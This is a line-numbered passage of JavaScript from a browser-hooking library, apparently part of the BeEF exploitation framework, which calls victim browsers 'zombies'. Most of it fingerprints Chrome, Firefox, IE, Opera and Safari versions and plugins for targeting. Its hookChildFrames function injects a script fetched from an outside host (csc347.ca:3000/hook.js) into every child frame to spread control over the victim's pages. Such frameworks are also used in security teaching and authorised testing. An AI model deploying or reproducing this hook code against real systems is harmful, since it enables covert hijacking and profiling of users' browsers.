  2496. */
  2497. isC9:function () {
  2498. return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 9) ? true : false);
  2499. },
  2500.  
  2501. /**
  2502. * Returns true if Chrome 10.
  2503. * @example: beef.browser.isC10()
  2504. */
  2505. isC10:function () {
  2506. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 10) ? true : false);
  2507. },
  2508.  
  2509. /**
  2510. * Returns true if Chrome 11.
  2511. * @example: beef.browser.isC11()
  2512. */
  2513. isC11:function () {
  2514. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 11) ? true : false);
  2515. },
  2516.  
  2517. /**
  2518. * Returns true if Chrome 12.
  2519. * @example: beef.browser.isC12()
  2520. */
  2521. isC12:function () {
  2522. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 12) ? true : false);
  2523. },
  2524.  
  2525. /**
  2526. * Returns true if Chrome 13.
  2527. * @example: beef.browser.isC13()
  2528. */
  2529. isC13:function () {
  2530. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 13) ? true : false);
  2531. },
  2532.  
  2533. /**
  2534. * Returns true if Chrome 14.
  2535. * @example: beef.browser.isC14()
  2536. */
  2537. isC14:function () {
  2538. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 14) ? true : false);
  2539. },
  2540.  
  2541. /**
  2542. * Returns true if Chrome 15.
  2543. * @example: beef.browser.isC15()
  2544. */
  2545. isC15:function () {
  2546. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 15) ? true : false);
  2547. },
  2548.  
  2549. /**
  2550. * Returns true if Chrome 16.
  2551. * @example: beef.browser.isC16()
  2552. */
  2553. isC16:function () {
  2554. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 16) ? true : false);
  2555. },
  2556.  
  2557. /**
  2558. * Returns true if Chrome 17.
  2559. * @example: beef.browser.isC17()
  2560. */
  2561. isC17:function () {
  2562. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 17) ? true : false);
  2563. },
  2564.  
  2565. /**
  2566. * Returns true if Chrome 18.
  2567. * @example: beef.browser.isC18()
  2568. */
  2569. isC18:function () {
  2570. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 18) ? true : false);
  2571. },
  2572.  
  2573. /**
  2574. * Returns true if Chrome 19.
  2575. * @example: beef.browser.isC19()
  2576. */
  2577. isC19:function () {
  2578. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
  2579. },
  2580.  
  2581. /**
  2582. * Returns true if Chrome for iOS 19.
  2583. * @example: beef.browser.isC19iOS()
  2584. */
  2585. isC19iOS:function () {
  2586. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
  2587. },
  2588.  
  2589. /**
  2590. * Returns true if Chrome 20.
  2591. * @example: beef.browser.isC20()
  2592. */
  2593. isC20:function () {
  2594. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
  2595. },
  2596.  
  2597. /**
  2598. * Returns true if Chrome for iOS 20.
  2599. * @example: beef.browser.isC20iOS()
  2600. */
  2601. isC20iOS:function () {
  2602. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
  2603. },
  2604.  
  2605. /**
  2606. * Returns true if Chrome 21.
  2607. * @example: beef.browser.isC21()
  2608. */
  2609. isC21:function () {
  2610. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
  2611. },
  2612.  
  2613. /**
  2614. * Returns true if Chrome for iOS 21.
  2615. * @example: beef.browser.isC21iOS()
  2616. */
  2617. isC21iOS:function () {
  2618. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
  2619. },
  2620.  
  2621. /**
  2622. * Returns true if Chrome 22.
  2623. * @example: beef.browser.isC22()
  2624. */
  2625. isC22:function () {
  2626. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
  2627. },
  2628.  
  2629. /**
  2630. * Returns true if Chrome for iOS 22.
  2631. * @example: beef.browser.isC22iOS()
  2632. */
  2633. isC22iOS:function () {
  2634. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
  2635. },
  2636.  
  2637. /**
  2638. * Returns true if Chrome 23.
  2639. * @example: beef.browser.isC23()
  2640. */
  2641. isC23:function () {
  2642. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
  2643. },
  2644.  
  2645. /**
  2646. * Returns true if Chrome for iOS 23.
  2647. * @example: beef.browser.isC23iOS()
  2648. */
  2649. isC23iOS:function () {
  2650. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
  2651. },
  2652.  
  2653. /**
  2654. * Returns true if Chrome 24.
  2655. * @example: beef.browser.isC24()
  2656. */
  2657. isC24:function () {
  2658. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
  2659. },
  2660.  
  2661. /**
  2662. * Returns true if Chrome for iOS 24.
  2663. * @example: beef.browser.isC24iOS()
  2664. */
  2665. isC24iOS:function () {
  2666. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
  2667. },
  2668.  
  2669. /**
  2670. * Returns true if Chrome 25.
  2671. * @example: beef.browser.isC25()
  2672. */
  2673. isC25:function () {
  2674. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
  2675. },
  2676.  
  2677. /**
  2678. * Returns true if Chrome for iOS 25.
  2679. * @example: beef.browser.isC25iOS()
  2680. */
  2681. isC25iOS:function () {
  2682. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
  2683. },
  2684.  
  2685. /**
  2686. * Returns true if Chrome 26.
  2687. * @example: beef.browser.isC26()
  2688. */
  2689. isC26:function () {
  2690. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
  2691. },
  2692.  
  2693. /**
  2694. * Returns true if Chrome for iOS 26.
  2695. * @example: beef.browser.isC26iOS()
  2696. */
  2697. isC26iOS:function () {
  2698. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
  2699. },
  2700.  
  2701. /**
  2702. * Returns true if Chrome 27.
  2703. * @example: beef.browser.isC27()
  2704. */
  2705. isC27:function () {
  2706. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
  2707. },
  2708.  
  2709. /**
  2710. * Returns true if Chrome for iOS 27.
  2711. * @example: beef.browser.isC27iOS()
  2712. */
  2713. isC27iOS:function () {
  2714. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
  2715. },
  2716.  
  2717. /**
  2718. * Returns true if Chrome 28.
  2719. * @example: beef.browser.isC28()
  2720. */
  2721. isC28:function () {
  2722. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
  2723. },
  2724.  
  2725. /**
  2726. * Returns true if Chrome for iOS 28.
  2727. * @example: beef.browser.isC28iOS()
  2728. */
  2729. isC28iOS:function () {
  2730. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
  2731. },
  2732.  
  2733. /**
  2734. * Returns true if Chrome 29.
  2735. * @example: beef.browser.isC29()
  2736. */
  2737. isC29:function () {
  2738. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
  2739. },
  2740.  
  2741. /**
  2742. * Returns true if Chrome for iOS 29.
  2743. * @example: beef.browser.isC29iOS()
  2744. */
  2745. isC29iOS:function () {
  2746. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
  2747. },
  2748.  
  2749. /**
  2750. * Returns true if Chrome 30.
  2751. * @example: beef.browser.isC30()
  2752. */
  2753. isC30:function () {
  2754. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
  2755. },
  2756.  
  2757. /**
  2758. * Returns true if Chrome for iOS 30.
  2759. * @example: beef.browser.isC30iOS()
  2760. */
  2761. isC30iOS:function () {
  2762. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
  2763. },
  2764.  
  2765. /**
  2766. * Returns true if Chrome 31.
  2767. * @example: beef.browser.isC31()
  2768. */
  2769. isC31:function () {
  2770. return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 31) ? true : false);
  2771. },
  2772.  
  2773. /**
  2774. * Returns true if Chrome for iOS 31.
  2775. * @example: beef.browser.isC31iOS()
  2776. */
  2777. isC31iOS:function () {
  2778. return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
  2779. },
  2780.  
  2781. /**
  2782. * Returns true if Chrome.
  2783. * @example: beef.browser.isC()
  2784. */
  2785. isC:function () {
  2786. return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS();
  2787. },
  2788.  
  2789. /**
  2790. * Returns true if Opera 9.50 through 9.52.
  2791. * @example: beef.browser.isO9_52()
  2792. */
  2793. isO9_52:function () {
  2794. return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null));
  2795. },
  2796.  
  2797. /**
  2798. * Returns true if Opera 9.60 through 9.64.
  2799. * @example: beef.browser.isO9_60()
  2800. */
  2801. isO9_60:function () {
  2802. return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null));
  2803. },
  2804.  
  2805. /**
  2806. * Returns true if Opera 10.xx.
  2807. * @example: beef.browser.isO10()
  2808. */
  2809. isO10:function () {
  2810. return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null));
  2811. },
  2812.  
  2813. /**
  2814. * Returns true if Opera 11.xx.
  2815. * @example: beef.browser.isO11()
  2816. */
  2817. isO11:function () {
  2818. return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null));
  2819. },
  2820.  
  2821. /**
  2822. * Returns true if Opera 12.xx.
  2823. * @example: beef.browser.isO12()
  2824. */
  2825. isO12:function () {
  2826. return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
  2827. },
  2828.  
  2829. /**
  2830. * Returns true if Opera.
  2831. * @example: beef.browser.isO()
  2832. */
  2833. isO:function () {
  2834. return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
  2835. },
  2836.  
  2837. /**
  2838. * Returns the type of browser being used.
  2839. * @example: beef.browser.type().IE6
  2840. * @example: beef.browser.type().FF
  2841. * @example: beef.browser.type().O
  2842. */
  2843. type:function () {
  2844.  
  2845. return {
  2846. C5:this.isC5(), // Chrome 5
  2847. C6:this.isC6(), // Chrome 6
  2848. C7:this.isC7(), // Chrome 7
  2849. C8:this.isC8(), // Chrome 8
  2850. C9:this.isC9(), // Chrome 9
  2851. C10:this.isC10(), // Chrome 10
  2852. C11:this.isC11(), // Chrome 11
  2853. C12:this.isC12(), // Chrome 12
  2854. C13:this.isC13(), // Chrome 13
  2855. C14:this.isC14(), // Chrome 14
  2856. C15:this.isC15(), // Chrome 15
  2857. C16:this.isC16(), // Chrome 16
  2858. C17:this.isC17(), // Chrome 17
  2859. C18:this.isC18(), // Chrome 18
  2860. C19:this.isC19(), // Chrome 19
  2861. C19iOS:this.isC19iOS(), // Chrome 19 on iOS
  2862. C20:this.isC20(), // Chrome 20
  2863. C20iOS:this.isC20iOS(), // Chrome 20 on iOS
  2864. C21:this.isC21(), // Chrome 21
  2865. C21iOS:this.isC21iOS(), // Chrome 21 on iOS
  2866. C22:this.isC22(), // Chrome 22
  2867. C22iOS:this.isC22iOS(), // Chrome 22 on iOS
  2868. C23:this.isC23(), // Chrome 23
  2869. C23iOS:this.isC23iOS(), // Chrome 23 on iOS
  2870. C24:this.isC24(), // Chrome 24
  2871. C24iOS:this.isC24iOS(), // Chrome 24 on iOS
  2872. C25:this.isC25(), // Chrome 25
  2873. C25iOS:this.isC25iOS(), // Chrome 25 on iOS
  2874. C26:this.isC26(), // Chrome 26
  2875. C26iOS:this.isC26iOS(), // Chrome 26 on iOS
  2876. C27:this.isC27(), // Chrome 27
  2877. C27iOS:this.isC27iOS(), // Chrome 27 on iOS
  2878. C28:this.isC28(), // Chrome 28
  2879. C28iOS:this.isC28iOS(), // Chrome 28 on iOS
  2880. C29:this.isC29(), // Chrome 29
  2881. C29iOS:this.isC29iOS(), // Chrome 29 on iOS
  2882. C30:this.isC30(), // Chrome 30
  2883. C30iOS:this.isC30iOS(), // Chrome 30 on iOS
  2884. C31:this.isC31(), // Chrome 31
  2885. C31iOS:this.isC31iOS(), // Chrome 31 on iOS
  2886. C:this.isC(), // Chrome any version
  2887.  
  2888. FF2:this.isFF2(), // Firefox 2
  2889. FF3:this.isFF3(), // Firefox 3
  2890. FF3_5:this.isFF3_5(), // Firefox 3.5
  2891. FF3_6:this.isFF3_6(), // Firefox 3.6
  2892. FF4:this.isFF4(), // Firefox 4
  2893. FF5:this.isFF5(), // Firefox 5
  2894. FF6:this.isFF6(), // Firefox 6
  2895. FF7:this.isFF7(), // Firefox 7
  2896. FF8:this.isFF8(), // Firefox 8
  2897. FF9:this.isFF9(), // Firefox 9
  2898. FF10:this.isFF10(), // Firefox 10
  2899. FF11:this.isFF11(), // Firefox 11
  2900. FF12:this.isFF12(), // Firefox 12
  2901. FF13:this.isFF13(), // Firefox 13
  2902. FF14:this.isFF14(), // Firefox 14
  2903. FF15:this.isFF15(), // Firefox 15
  2904. FF16:this.isFF16(), // Firefox 16
  2905. FF17:this.isFF17(), // Firefox 17
  2906. FF18:this.isFF18(), // Firefox 18
  2907. FF19:this.isFF19(), // Firefox 19
  2908. FF20:this.isFF20(), // Firefox 20
  2909. FF21:this.isFF21(), // Firefox 21
  2910. FF22:this.isFF22(), // Firefox 22
  2911. FF23:this.isFF23(), // Firefox 23
  2912. FF24:this.isFF24(), // Firefox 24
  2913. FF25:this.isFF25(), // Firefox 25
  2914. FF26:this.isFF26(), // Firefox 26
  2915. FF: this.isFF(), // Firefox any version
  2916.  
  2917. IE6:this.isIE6(), // Internet Explorer 6
  2918. IE7:this.isIE7(), // Internet Explorer 7
  2919. IE8:this.isIE8(), // Internet Explorer 8
  2920. IE9:this.isIE9(), // Internet Explorer 9
  2921. IE10:this.isIE10(), // Internet Explorer 10
  2922. IE:this.isIE(), // Internet Explorer any version
  2923.  
  2924. O9_52:this.isO9_52(), // Opera 9.50 through 9.52
  2925. O9_60:this.isO9_60(), // Opera 9.60 through 9.64
  2926. O10:this.isO10(), // Opera 10.xx
  2927. O11:this.isO11(), // Opera 11.xx
  2928. O12:this.isO12(), // Opera 12.xx
  2929. O: this.isO(), // Opera any version
  2930.  
  2931. S4:this.isS4(), // Safari 4.xx
  2932. S5:this.isS5(), // Safari 5.xx
  2933. S6:this.isS6(), // Safari 6.x
  2934. S: this.isS() // Safari any version
  2935. }
  2936. },
  2937.  
  2938. /**
  2939. * Returns the type of browser being used.
  2940. * @return: {String} User agent software and version.
  2941. *
  2942. * @example: beef.browser.getBrowserVersion()
  2943. */
  2944. getBrowserVersion:function () {
  2945.  
  2946. if (this.isC5()) {
  2947. return '5'
  2948. }
  2949. ; // Chrome 5
  2950. if (this.isC6()) {
  2951. return '6'
  2952. }
  2953. ; // Chrome 6
  2954. if (this.isC7()) {
  2955. return '7'
  2956. }
  2957. ; // Chrome 7
  2958. if (this.isC8()) {
  2959. return '8'
  2960. }
  2961. ; // Chrome 8
  2962. if (this.isC9()) {
  2963. return '9'
  2964. }
  2965. ; // Chrome 9
  2966. if (this.isC10()) {
  2967. return '10'
  2968. }
  2969. ; // Chrome 10
  2970. if (this.isC11()) {
  2971. return '11'
  2972. }
  2973. ; // Chrome 11
  2974. if (this.isC12()) {
  2975. return '12'
  2976. }
  2977. ; // Chrome 12
  2978. if (this.isC13()) {
  2979. return '13'
  2980. }
  2981. ; // Chrome 13
  2982. if (this.isC14()) {
  2983. return '14'
  2984. }
  2985. ; // Chrome 14
  2986. if (this.isC15()) {
  2987. return '15'
  2988. }
  2989. ; // Chrome 15
  2990. if (this.isC16()) {
  2991. return '16'
  2992. }
  2993. ; // Chrome 16
  2994. if (this.isC17()) {
  2995. return '17'
  2996. }
  2997. ; // Chrome 17
  2998. if (this.isC18()) {
  2999. return '18'
  3000. }
  3001. ; // Chrome 18
  3002. if (this.isC19()) {
  3003. return '19'
  3004. }
  3005. ; // Chrome 19
  3006. if (this.isC19iOS()) {
  3007. return '19'
  3008. }
  3009. ; // Chrome 19 for iOS
  3010. if (this.isC20()) {
  3011. return '20'
  3012. }
  3013. ; // Chrome 20
  3014. if (this.isC20iOS()) {
  3015. return '20'
  3016. }
  3017. ; // Chrome 20 for iOS
  3018. if (this.isC21()) {
  3019. return '21'
  3020. }
  3021. ; // Chrome 21
  3022. if (this.isC21iOS()) {
  3023. return '21'
  3024. }
  3025. ; // Chrome 21 for iOS
  3026. if (this.isC22()) {
  3027. return '22'
  3028. }
  3029. ; // Chrome 22
  3030. if (this.isC22iOS()) {
  3031. return '22'
  3032. }
  3033. ; // Chrome 22 for iOS
  3034. if (this.isC23()) {
  3035. return '23'
  3036. }
  3037. ; // Chrome 23
  3038. if (this.isC23iOS()) {
  3039. return '23'
  3040. }
  3041. ; // Chrome 23 for iOS
  3042. if (this.isC24()) {
  3043. return '24'
  3044. }
  3045. ; // Chrome 24
  3046. if (this.isC24iOS()) {
  3047. return '24'
  3048. }
  3049. ; // Chrome 24 for iOS
  3050. if (this.isC25()) {
  3051. return '25'
  3052. }
  3053. ; // Chrome 25
  3054. if (this.isC25iOS()) {
  3055. return '25'
  3056. }
  3057. ; // Chrome 25 for iOS
  3058. if (this.isC26()) {
  3059. return '26'
  3060. }
  3061. ; // Chrome 26
  3062. if (this.isC26iOS()) {
  3063. return '26'
  3064. }
  3065. ; // Chrome 26 for iOS
  3066. if (this.isC27()) {
  3067. return '27'
  3068. }
  3069. ; // Chrome 27
  3070. if (this.isC27iOS()) {
  3071. return '27'
  3072. }
  3073. ; // Chrome 27 for iOS
  3074. if (this.isC28()) {
  3075. return '28'
  3076. }
  3077. ; // Chrome 28
  3078. if (this.isC28iOS()) {
  3079. return '28'
  3080. }
  3081. ; // Chrome 28 for iOS
  3082. if (this.isC29()) {
  3083. return '29'
  3084. }
  3085. ; // Chrome 29
  3086. if (this.isC29iOS()) {
  3087. return '29'
  3088. }
  3089. ; // Chrome 29 for iOS
  3090. if (this.isC30()) {
  3091. return '30'
  3092. }
  3093. ; // Chrome 30
  3094. if (this.isC30iOS()) {
  3095. return '30'
  3096. }
  3097. ; // Chrome 30 for iOS
  3098. if (this.isC31()) {
  3099. return '31'
  3100. }
  3101. ; // Chrome 31
  3102. if (this.isC31iOS()) {
  3103. return '31'
  3104. }
  3105. ; // Chrome 31 for iOS
  3106. if (this.isFF2()) {
  3107. return '2'
  3108. }
  3109. ; // Firefox 2
  3110. if (this.isFF3()) {
  3111. return '3'
  3112. }
  3113. ; // Firefox 3
  3114. if (this.isFF3_5()) {
  3115. return '3.5'
  3116. }
  3117. ; // Firefox 3.5
  3118. if (this.isFF3_6()) {
  3119. return '3.6'
  3120. }
  3121. ; // Firefox 3.6
  3122. if (this.isFF4()) {
  3123. return '4'
  3124. }
  3125. ; // Firefox 4
  3126. if (this.isFF5()) {
  3127. return '5'
  3128. }
  3129. ; // Firefox 5
  3130. if (this.isFF6()) {
  3131. return '6'
  3132. }
  3133. ; // Firefox 6
  3134. if (this.isFF7()) {
  3135. return '7'
  3136. }
  3137. ; // Firefox 7
  3138. if (this.isFF8()) {
  3139. return '8'
  3140. }
  3141. ; // Firefox 8
  3142. if (this.isFF9()) {
  3143. return '9'
  3144. }
  3145. ; // Firefox 9
  3146. if (this.isFF10()) {
  3147. return '10'
  3148. }
  3149. ; // Firefox 10
  3150. if (this.isFF11()) {
  3151. return '11'
  3152. }
  3153. ; // Firefox 11
  3154. if (this.isFF12()) {
  3155. return '12'
  3156. }
  3157. ; // Firefox 12
  3158. if (this.isFF13()) {
  3159. return '13'
  3160. }
  3161. ; // Firefox 13
  3162. if (this.isFF14()) {
  3163. return '14'
  3164. }
  3165. ; // Firefox 14
  3166. if (this.isFF15()) {
  3167. return '15'
  3168. }
  3169. ; // Firefox 15
  3170. if (this.isFF16()) {
  3171. return '16'
  3172. }
  3173. ; // Firefox 16
  3174. if (this.isFF17()) {
  3175. return '17'
  3176. }
  3177. ; // Firefox 17
  3178. if (this.isFF18()) {
  3179. return '18'
  3180. }
  3181. ; // Firefox 18
  3182. if (this.isFF19()) {
  3183. return '19'
  3184. }
  3185. ; // Firefox 19
  3186. if (this.isFF20()) {
  3187. return '20'
  3188. }
  3189. ; // Firefox 20
  3190. if (this.isFF21()) {
  3191. return '21'
  3192. }
  3193. ; // Firefox 21
  3194. if (this.isFF22()) {
  3195. return '22'
  3196. }
  3197. ; // Firefox 22
  3198. if (this.isFF23()) {
  3199. return '23'
  3200. }
  3201. ; // Firefox 23
  3202. if (this.isFF24()) {
  3203. return '24'
  3204. }
  3205. ; // Firefox 24
  3206. if (this.isFF25()) {
  3207. return '25'
  3208. }
  3209. ; // Firefox 25
  3210. if (this.isFF26()) {
  3211. return '26'
  3212. }
  3213. ; // Firefox 26
  3214.  
  3215.  
  3216. if (this.isIE6()) {
  3217. return '6'
  3218. }
  3219. ; // Internet Explorer 6
  3220. if (this.isIE7()) {
  3221. return '7'
  3222. }
  3223. ; // Internet Explorer 7
  3224. if (this.isIE8()) {
  3225. return '8'
  3226. }
  3227. ; // Internet Explorer 8
  3228. if (this.isIE9()) {
  3229. return '9'
  3230. }
  3231. ; // Internet Explorer 9
  3232. if (this.isIE10()) {
  3233. return '10'
  3234. }
  3235. ; // Internet Explorer 10
  3236.  
  3237. if (this.isS4()) {
  3238. return '4'
  3239. }
  3240. ; // Safari 4
  3241. if (this.isS5()) {
  3242. return '5'
  3243. }
  3244. ; // Safari 5
  3245. if (this.isS6()) {
  3246. return '6'
  3247. }
  3248. ; // Safari 6
  3249.  
  3250. if (this.isO9_52()) {
  3251. return '9.5'
  3252. }
  3253. ; // Opera 9.5x
  3254. if (this.isO9_60()) {
  3255. return '9.6'
  3256. }
  3257. ; // Opera 9.6
  3258. if (this.isO10()) {
  3259. return '10'
  3260. }
  3261. ; // Opera 10.xx
  3262. if (this.isO11()) {
  3263. return '11'
  3264. }
  3265. ; // Opera 11.xx
  3266. if (this.isO12()) {
  3267. return '12'
  3268. }
  3269. ; // Opera 12.xx
  3270.  
  3271. return 'UNKNOWN'; // Unknown UA
  3272. },
  3273.  
  3274. /**
  3275. * Returns the type of user agent by hooked browser.
  3276. * @return: {String} User agent software.
  3277. *
  3278. * @example: beef.browser.getBrowserName()
  3279. */
  3280. getBrowserName:function () {
  3281.  
  3282. if (this.isC()) {
  3283. return 'C'
  3284. }
  3285. ; // Chrome any version
  3286. if (this.isFF()) {
  3287. return 'FF'
  3288. }
  3289. ; // Firefox any version
  3290. if (this.isIE()) {
  3291. return 'IE'
  3292. }
  3293. ; // Internet Explorer any version
  3294. if (this.isO()) {
  3295. return 'O'
  3296. }
  3297. ; // Opera any version
  3298. if (this.isS()) {
  3299. return 'S'
  3300. }
  3301. ; // Safari any version
  3302. return 'UNKNOWN'; // Unknown UA
  3303. },
  3304.  
  3305. /**
  3306. * Hooks all child frames in the current window
  3307. * Restricted by same-origin policy
  3308. */
  3309. hookChildFrames:function () {
  3310.  
  3311. // create script object
  3312. var script = document.createElement('script');
  3313. script.type = 'text/javascript';
  3314. script.src = 'http://csc347.ca:3000/hook.js';
  3315.  
  3316. // loop through child frames
  3317. for (var i=0;i<self.frames.length;i++) {
  3318. try {
  3319. // append hook script
  3320. self.frames[i].document.body.appendChild(script);
  3321. beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
  3322. } catch (e) {
  3323. // warn on cross-domain
  3324. beef.debug("Hooking child frame failed: "+e.message);
  3325. }
  3326. }
  3327. },
  3328.  
  3329. /**
  3330. * Checks if the zombie has flash installed and enabled.
  3331. * @return: {Boolean} true or false.
  3332. *
  3333. * @example: if(beef.browser.hasFlash()) { ... }
  3334. */
  3335. hasFlash:function () {
  3336. if (!this.type().IE) {
  3337. return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
  3338. } else {
  3339. flash_versions = 12;
  3340. flash_installed = false;
  3341.  
  3342. if (window.ActiveXObject) {
  3343. for (x = 2; x <= flash_versions; x++) {
  3344. try {
  3345. Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
  3346. if (Flash) {
  3347. flash_installed = true;
  3348. }
  3349. }
  3350. catch (e) {
  3351. beef.debug("Creating Flash ActiveX object failed: "+e.message);
  3352. }
  3353. }
  3354. }
  3355. return flash_installed;
  3356. }
  3357. },
  3358.  
  3359. /**
  3360. * Checks if the zombie has the QuickTime plugin installed.
  3361. * @return: {Boolean} true or false.
  3362. *
